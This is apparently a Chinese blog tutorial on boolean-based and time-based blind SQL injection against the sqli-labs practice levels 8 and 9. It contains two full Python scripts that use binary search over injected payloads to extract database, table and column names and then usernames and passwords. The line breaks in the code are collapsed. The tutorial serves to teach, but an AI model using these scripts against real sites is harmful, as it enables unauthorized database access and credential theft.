当前位置：首页 > news >正文

SQL布尔盲注、时间盲注

news 2026/5/12 2:21:20

一、布尔盲注

布尔盲注（Boolean-based Blind SQL Injection）是一种SQL注入技术，用于在应用程序不直接显示数据库查询结果的情况下，通过构造特定的SQL查询并根据页面返回的不同结果来推测数据库中的信息。这种方法依赖于SQL查询的结果是否为真或假，进而推断出数据库中的具体信息。

案例为sqlilabs中的第八关，采用二分查找

python脚本：

import requests
def get_database(URL):# 获取数据库名称s = ""for i in range(1, 10):low = 32high = 128mid = (low + high) // 2while (high > low):payload = {"id": f"1' and greatest(ascii(substr(database(),{i},1)),{mid})={mid} -- "}  # 相当于第一个字符<={mid}条件判断为真res = requests.get(url=URL, params=payload)if "You are in" in res.text:high = midmid = (low + high) // 2else:low = mid + 1mid = (low + high) // 2s += chr(mid)print("数据库名称:" + s)def get_table(URL):# 获取表名称s = ""for i in range(1, 32):low = 32high = 128mid = (low + high) // 2while (high > low):payload = {"id": f"1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid} -- "}res = requests.get(url=URL, params=payload)if "You are in" in res.text:low = mid + 1mid = (low + high) // 2else:high = midmid = (low + high) // 2s += chr(mid)print("表的名称:" + s)def get_column(URL):# 获取管理员的字段名称s = ""for i in range(1, 32):low = 32high = 128mid = (low + high) // 2while (high > low):payload = {"id": f"1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid} -- "}res = requests.get(url=URL, params=payload)if "You are in" in res.text:low = mid + 1mid = (low + high) // 2else:high = midmid = (low + high) // 2s += chr(mid)print("users表的列:" + s)def get_result(URl):# 获取用户名和密码信息s = ""for i in range(1, 32):low = 32high = 128mid = (low + high) // 2while (high > low):payload = {"id": f"1' and ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid} -- "}res = requests.get(url=URL, params=payload)if "You are in" in res.text:low = mid + 1mid = (low + high) // 2else:high = midmid = (low + high) // 2s += chr(mid)print("users表具体数据:" + s)if __name__ == '__main__':URL = "http://127.0.0.1/sqlilabs/Less-8/index.php"get_database(URL)get_table(URL)get_column(URL)get_result(URL)

运行结果

二、时间盲注

时间盲注（Time-based Blind SQL Injection）是一种SQL注入技术，用于在应用程序没有直接回显数据库查询结果的情况下，通过构造特定的SQL查询来推测数据库中的信息。这种方法依赖于数据库处理查询时产生的延迟响应来判断条件的真假。

案例为sqlilabs中的第九关，同样为二分查找

python脚本

import requests
import datetimedef get_database(URL):# 获取数据库名称s = ""for i in range(1, 10):low = 32high = 128mid = (low + high) // 2while (high > low):payload = {"id": f"1' and if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),sleep(3),1) -- "}  # 相当于第一个字符<={mid}条件判断为真start = datetime.datetime.now()res = requests.get(url=URL, params=payload)end = datetime.datetime.now()if (end - start).seconds >= 3:high = midmid = (low + high) // 2else:low = mid + 1mid = (low + high) // 2s += chr(mid)print("数据库名称:" + s)def get_table(URL):# 获取表名称s = ""for i in range(1, 32):low = 32high = 128mid = (low + high) // 2while (high > low):payload = {"id": f"1' and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(3),1) -- "}start = datetime.datetime.now()res = requests.get(url=URL, params=payload)end = datetime.datetime.now()if (end - start).seconds >= 3:low = mid + 1mid = (low + high) // 2else:high = midmid = (low + high) // 2s += chr(mid)print("表的名称:" + s)def get_column(URL):# 获取管理员的字段名称s = ""for i in range(1, 32):low = 32high = 128mid = (low + high) // 2while (high > low):payload = {"id": f"1' and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(3),1) -- "}start = datetime.datetime.now()res = requests.get(url=URL, params=payload)end = datetime.datetime.now()if (end - start).seconds >= 3:low = mid + 1mid = (low + high) // 2else:high = midmid = (low + high) // 2s += chr(mid)print("users表的列:" + s)def get_result(URl):# 获取用户名和密码信息s = ""for i in range(1, 32):low = 32high = 128mid = (low + high) // 2while (high > low):payload = {"id": f"1' and if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(3),1) -- "}start = datetime.datetime.now()res = requests.get(url=URL, params=payload)end = datetime.datetime.now()if (end - start).seconds >= 3:low = mid + 1mid = (low + high) // 2else:high = midmid = (low + high) // 2s += chr(mid)print("users中的具体数据:" + s)if __name__ == '__main__':URL = "http://127.0.0.1/sqlilabs/Less-9/index.php"# get_database(URL)get_table(URL)# get_column(URL)# get_result(URL)

运行结果：

SQL布尔盲注、时间盲注

一、布尔盲注

二、时间盲注

相关文章：

SQL布尔盲注、时间盲注

RocketMQ与kafka如何解决消息丢失问题？

Uniapp 获取定位详解：从申请Key到实现定位功能

【Vue3 入门到实战】14. telePort 和 Suspense组件

Golang的并发编程案例详解

IS-IS 泛洪机制 | LSP 处理流程

原型模式详解（Java）

内存条2R×4 2400和4R×4 2133的性能差异

安装并配置 MySQL

常用的网络安全设备

【蓝桥】线性DP--最快洗车时间

Spring Boot比Spring多哪些注解？

springboot021校园周边美食探索及分享平台

【网络通信】传输层之UDP协议

Python环境搭建与量化交易开发：从基础到实战

软著申请（六）软著返修流程【2025年最新版】

SOUI基于Zint生成Code11码

sqlilabs第八关

基于HAL库的按钮实验

DeepSeek 突然来袭，AI 大模型变革的危机与转机藏在哪？

为Dify扩展AI图表与文档生成能力：微服务架构实战指南

Midjourney水彩风提示词已进入“语义过载”危机？2024Q2最新精简指令集发布（仅保留11个高响应关键词，准确率提升63.8%）

终极ROFL播放器指南：如何免费快速解锁英雄联盟回放文件分析

STM32H750调试KSZ8863翻车实录：从F4经验到H7的坑，硬件配置避雷指南

从MATLAB验证到RTL实现：一个完整华莱士树乘法器的设计、仿真与调试实战

2026届学术党必备的降重复率平台横评

X-TRACK开源GPS自行车码表终极指南：从硬件组装到软件配置的完整教程

ARM AMBA总线演进史：从AHB到AXI，再到CHI和ACE，我们经历了什么？

不想注册Nvidia账户？手把手教你修改app.js文件，让GeForce Experience直接进主界面

【高通SDM660平台】Camera 驱动 Bringup 实战：从 DTS 配置到 Vendor 模块集成